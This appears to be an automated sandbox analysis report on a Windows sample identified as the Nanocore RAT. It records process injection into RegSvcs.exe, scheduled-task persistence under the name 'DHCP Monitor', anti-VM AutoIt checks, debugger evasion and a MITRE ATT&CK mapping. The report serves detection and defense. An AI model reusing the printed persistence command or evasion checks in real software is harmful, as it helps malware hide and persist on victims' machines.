        Boot Survival:

        Uses schtasks.exe or at.exe to add and modify task schedules
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp7982.tmp'

        Hooking and other Techniques for Hiding and Protection:

        Hides that the sample has been downloaded from the Internet (zone.identifier)
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, File opened: C:\Users\user\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | delete
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 4_2_004243FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,4_2_004243FF
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_0046A2EA IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,13_2_0046A2EA
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_004243FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,13_2_004243FF
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe, Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\31956653\xmjk.pif, Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe, Process information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exe, Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        Yara detected AntiVM autoit script
        Source: Yara match, File source: Process Memory Space: xmjk.pif PID: 6660, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: xmjk.pif PID: 4356, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: xmjk.pif PID: 3412, type: MEMORYSTR
        Source: C:\Users\user\31956653\xmjk.pif TID: 4620, Thread sleep count: 59 > 30
        Source: C:\Users\user\31956653\xmjk.pif TID: 4620, Thread sleep count: 120 > 30
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6060, Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\31956653\xmjk.pif TID: 4520, Thread sleep count: 66 > 30
        Source: C:\Users\user\31956653\xmjk.pif TID: 4520, Thread sleep count: 113 > 30
        Source: C:\Users\user\31956653\xmjk.pif TID: 6340, Thread sleep count: 64 > 30
        Source: C:\Users\user\31956653\xmjk.pif TID: 6340, Thread sleep count: 105 > 30
        Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, Thread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, Window / User API: threadDelayed 2391
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, Window / User API: threadDelayed 7014
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, Window / User API: foregroundWindowGot 624
        Source: C:\Windows\System32\wscript.exe, Window found: window name: WSH-Timer
        Source: xmjk.pif, 0000001B.00000003.419735633.00000000004E1000.00000004.00000001.sdmp, Binary or memory string: If ProcessExists("VboxService.exe") Then
        Source: xmjk.pif, 00000014.00000003.400055049.0000000003DFB000.00000004.00000001.sdmp, Binary or memory string: VMwareService.exe59767
        Source: xmjk.pif, 00000014.00000003.399966022.0000000003DE5000.00000004.00000001.sdmp, Binary or memory string: rocessExists("VboxService.exe") Then
        Source: xmjk.pif, 0000001B.00000003.421265433.00000000004E5000.00000004.00000001.sdmp, Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then7s2
        Source: xmjk.pif, 0000001B.00000003.426696174.0000000000509000.00000004.00000001.sdmp, Binary or memory string: VMwareUser.exe\Microso
        Source: xmjk.pif, 00000014.00000003.400055049.0000000003DFB000.00000004.00000001.sdmp, Binary or memory string: VMwareUser.exe5FB536C7
        Source: xmjk.pif, 0000001B.00000003.421265433.00000000004E5000.00000004.00000001.sdmp, Binary or memory string: If ProcessExists("VMwaretray.exe") Then
        Source: xmjk.pif, 00000014.00000003.399551855.0000000003DE1000.00000004.00000001.sdmp, Binary or memory string: If ProcessExists("VMwaretray.exe") ThenR
        Source: xmjk.pif, 00000004.00000003.358349289.00000000036C9000.00000004.00000001.sdmp, Binary or memory string: VBoxTray.exeGL5
        Source: xmjk.pif, 00000014.00000003.400055049.0000000003DFB000.00000004.00000001.sdmp, Binary or memory string: VBoxTray.exe`i
        Source: xmjk.pif, 0000001B.00000003.426696174.0000000000509000.00000004.00000001.sdmp, Binary or memory string: VMwareService.exe8
        Source: xmjk.pif, 0000001B.00000003.419735633.00000000004E1000.00000004.00000001.sdmp, Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then58)
        Source: xmjk.pif, 00000004.00000003.358349289.00000000036C9000.00000004.00000001.sdmp, Binary or memory string: VMwaretray.exe[N
        Source: xmjk.pif, 00000014.00000003.399966022.0000000003DE5000.00000004.00000001.sdmp, xmjk.pif, 0000001B.00000003.421265433.00000000004E5000.00000004.00000001.sdmp, Binary or memory string: If ProcessExists("VBoxTray.exe") ThendJ
        Source: xmjk.pif, 0000001B.00000003.426696174.0000000000509000.00000004.00000001.sdmp, Binary or memory string: VMwaretray.exe
        Source: xmjk.pif, 0000001B.00000003.419735633.00000000004E1000.00000004.00000001.sdmp, Binary or memory string: If ProcessExists("VBoxTray.exe") ThendJ7
        Source: xmjk.pif, 0000001B.00000003.421265433.00000000004E5000.00000004.00000001.sdmp, Binary or memory string: nXHMNrocessExists("VboxService.exe") Then
        Source: xmjk.pif, 00000004.00000003.342061391.0000000003691000.00000004.00000001.sdmp, Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then1S6
        Source: RegSvcs.exe, 00000006.00000003.460013328.00000000013E0000.00000004.00000001.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
        Source: xmjk.pif, 00000004.00000003.358349289.00000000036C9000.00000004.00000001.sdmp, Binary or memory string: VMwareService.exe536C7
        Source: xmjk.pif, 00000014.00000003.400055049.0000000003DFB000.00000004.00000001.sdmp, Binary or memory string: VboxService.exeEi
        Source: xmjk.pif, 0000001B.00000003.426696174.0000000000509000.00000004.00000001.sdmp, Binary or memory string: VBoxTray.exe
        Source: xmjk.pif, 00000004.00000003.342061391.0000000003691000.00000004.00000001.sdmp, Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenQ
        Source: xmjk.pif, 0000001B.00000003.421265433.00000000004E5000.00000004.00000001.sdmp, Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then58
        Source: xmjk.pif, 0000001B.00000003.419735633.00000000004E1000.00000004.00000001.sdmp, Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then7s2;
        Source: xmjk.pif, 00000004.00000003.358349289.00000000036C9000.00000004.00000001.sdmp, Binary or memory string: VboxService.exeFN4
        Source: xmjk.pif, 0000001B.00000003.426696174.0000000000509000.00000004.00000001.sdmp, Binary or memory string: VboxService.exe
        Source: xmjk.pif, 00000004.00000003.358349289.00000000036C9000.00000004.00000001.sdmp, Binary or memory string: VMwareUser.exeGM
        Source: xmjk.pif, 00000004.00000003.342061391.0000000003691000.00000004.00000001.sdmp, Binary or memory string: If ProcessExists("VBoxTray.exe") ThenaF
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe, Code function: 0_2_00CBD353 VirtualQuery,GetSystemInfo,0_2_00CBD353
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe, Code function: 0_2_00CAA2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CAA2DF
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe, Code function: 0_2_00CC9FD3 FindFirstFileExA,0_2_00CC9FD3
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe, Code function: 0_2_00CBAFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CBAFB9
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 4_2_0042399B GetFileAttributesW,FindFirstFileW,FindClose,4_2_0042399B
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 4_2_0043BCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,4_2_0043BCB3
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 4_2_00442408 FindFirstFileW,Sleep,FindNextFileW,FindClose,4_2_00442408
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 4_2_0043280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_0043280D
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 4_2_00421A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00421A73
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 4_2_0043BF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_0043BF17
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_00442408 FindFirstFileW,Sleep,FindNextFileW,FindClose,13_2_00442408
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_00468877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,13_2_00468877
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_0043280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_0043280D
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_0042399B GetFileAttributesW,FindFirstFileW,FindClose,13_2_0042399B
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_00421A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00421A73
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_0044CAE7 FindFirstFileW,FindNextFileW,FindClose,13_2_0044CAE7
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_0043BCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,13_2_0043BCB3
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_0044DE7C FindFirstFileW,FindClose,13_2_0044DE7C
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_0043BF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_0043BF17
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 4_2_003FEE30 LoadLibraryA,GetProcAddress,4_2_003FEE30
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe, Code function: 0_2_00CC6AF3 mov eax, dword ptr fs:[00000030h]0_2_00CC6AF3
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe, Code function: 0_2_00CBE4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CBE4F5
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe, Code function: 0_2_00CCACA1 GetProcessHeap,0_2_00CCACA1
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 4_2_0044A35D BlockInput,4_2_0044A35D
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, Memory allocated: page read and write | page guard
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe, Code function: 0_2_00CBE643 SetUnhandledExceptionFilter,0_2_00CBE643
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe, Code function: 0_2_00CBE7FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00CBE7FB
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe, Code function: 0_2_00CC7BE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CC7BE1
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 4_2_0040A128 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040A128
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 4_2_00407CCD _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00407CCD
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_0040F170 SetUnhandledExceptionFilter,13_2_0040F170
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_0040A128 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_0040A128
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_00407CCD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00407CCD

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Allocates memory in foreign processes
        Source: C:\Users\user\31956653\xmjk.pif Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: B00000 protect: page execute and read and write
        Source: C:\Users\user\31956653\xmjk.pif Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: BC0000 protect: page execute and read and write
        Source: C:\Users\user\31956653\xmjk.pif Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 750000 protect: page execute and read and write
        Injects a PE file into a foreign processes
        Source: C:\Users\user\31956653\xmjk.pif Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: B00000 value starts with: 4D5A
        Source: C:\Users\user\31956653\xmjk.pif Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: BC0000 value starts with: 4D5A
        Source: C:\Users\user\31956653\xmjk.pif Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 750000 value starts with: 4D5A
        Writes to foreign memory regions
        Source: C:\Users\user\31956653\xmjk.pif Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: B00000
        Source: C:\Users\user\31956653\xmjk.pif Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 898000
        Source: C:\Users\user\31956653\xmjk.pif Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: BC0000
        Source: C:\Users\user\31956653\xmjk.pif Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 89E000
        Source: C:\Users\user\31956653\xmjk.pif Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 750000
        Source: C:\Users\user\31956653\xmjk.pif Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 424000
        Source: C:\Users\user\31956653\xmjk.pif Code function: 4_2_004243FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,4_2_004243FF
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe Process created: C:\Users\user\31956653\xmjk.pif 'C:\Users\user\31956653\xmjk.pif' thjfdg.xcp
        Source: C:\Users\user\31956653\xmjk.pif Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp7982.tmp'
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7CDE.tmp'
        Source: C:\Users\user\31956653\xmjk.pif Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
        Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\31956653\xmjk.pif 'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp
        Source: C:\Users\user\31956653\xmjk.pif Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
        Source: C:\Users\user\31956653\xmjk.pif Code function: 4_2_00426C61 LogonUserW,4_2_00426C61
        Source: C:\Users\user\31956653\xmjk.pif Code function: 4_2_003FD7A0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,4_2_003FD7A0
        Source: C:\Users\user\31956653\xmjk.pif Code function: 4_2_00423321 __wcsicoll,mouse_event,__wcsicoll,mouse_event,4_2_00423321
        Source: C:\Users\user\31956653\xmjk.pif Code function: 4_2_0043602A GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,4_2_0043602A
        Source: xmjk.pif, 00000004.00000003.358349289.00000000036C9000.00000004.00000001.sdmp, RegSvcs.exe, 00000006.00000002.581184537.000000000665B000.00000004.00000001.sdmp, xmjk.pif, 00000014.00000003.400055049.0000000003DFB000.00000004.00000001.sdmp, xmjk.pif, 0000001B.00000003.426696174.0000000000509000.00000004.00000001.sdmp Binary or memory string: Program Manager
        Source: xmjk.pif Binary or memory string: Shell_TrayWnd
        Source: RegSvcs.exe, 00000006.00000002.575911182.00000000018A0000.00000002.00020000.sdmp Binary or memory string: Progman
        Source: xmjk.pif, 0000001B.00000003.419735633.00000000004E1000.00000004.00000001.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" Then6
        Source: xmjk.pif, 00000004.00000003.342061391.0000000003691000.00000004.00000001.sdmp, xmjk.pif, 00000014.00000003.399966022.0000000003DE5000.00000004.00000001.sdmp, xmjk.pif, 0000001B.00000003.421265433.00000000004E5000.00000004.00000001.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" Then
        Source: RegSvcs.exe, 00000006.00000002.575911182.00000000018A0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
        Source: xmjk.pif, 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp, xmjk.pif, 0000000D.00000002.366781987.0000000000472000.00000002.00020000.sdmp, xmjk.pif, 00000014.00000000.372469272.0000000000472000.00000002.00020000.sdmp, xmjk.pif, 00000016.00000000.390599196.0000000000472000.00000002.00020000.sdmp, xmjk.pif, 0000001B.00000000.396587647.0000000000472000.00000002.00020000.sdmp Binary or memory string: ICASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript PausedblankinfoquestionstopwarningAutoIt -
        Source: RegSvcs.exe, 00000006.00000002.576824260.0000000002F66000.00000004.00000001.sdmp Binary or memory string: Program Manager\2z
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe Code function: GetLocaleInfoW,GetNumberFormatW,0_2_00CB9D99
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe Code function: 0_2_00CBE34B cpuid 0_2_00CBE34B
        Source: C:\Users\user\31956653\xmjk.pif Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe Code function: 0_2_00CBCBB8 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,0_2_00CBCBB8
        Source: C:\Users\user\31956653\xmjk.pif Code function: 4_2_0040E284 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,4_2_0040E284
        Source: C:\Users\user\31956653\xmjk.pif Code function: 13_2_00462BF9 GetUserNameW,13_2_00462BF9
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe Code function: 0_2_00CAA995 GetVersionExW,0_2_00CAA995

        Stealing of Sensitive Information:

        Yara detected Nanocore RAT
        Source: xmjk.pif Binary or memory string: WIN_XP
        Source: xmjk.pif Binary or memory string: WIN_XPe
        Source: xmjk.pif Binary or memory string: WIN_VISTA
        Source: xmjk.pif, 0000001B.00000000.396587647.0000000000472000.00000002.00020000.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte!
        Source: xmjk.pif Binary or memory string: WIN_7
        Source: xmjk.pif Binary or memory string: WIN_8

        Remote Access Functionality:

        Detected Nanocore Rat
        Source: xmjk.pif, 00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: RegSvcs.exe, 00000006.00000002.576672734.0000000002EE1000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: xmjk.pif, 00000014.00000003.394776495.0000000004C6A000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: RegSvcs.exe, 00000019.00000002.418519690.0000000003471000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: xmjk.pif, 0000001B.00000003.411798480.0000000003E28000.00000004.00000001.sdmp, String found in binary or memory: NanoCore.ClientPluginHost
        Yara detected Nanocore RAT
        Source: Yara match, File source: Process Memory Space: xmjk.pif PID: 6660, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 5792, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: xmjk.pif PID: 4356, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 5572, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: xmjk.pif PID: 3412, type: MEMORYSTR
        Source: C:\Users\user\31956653\xmjk.pif, Code function: 13_2_0045C06C OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,#35,13_2_0045C06C

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts 2 | Scripting 11 | DLL Side-Loading 1 | Exploitation for Privilege Escalation 1 | Disable or Modify Tools 11 | Input Capture 31 | System Time Discovery 2 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
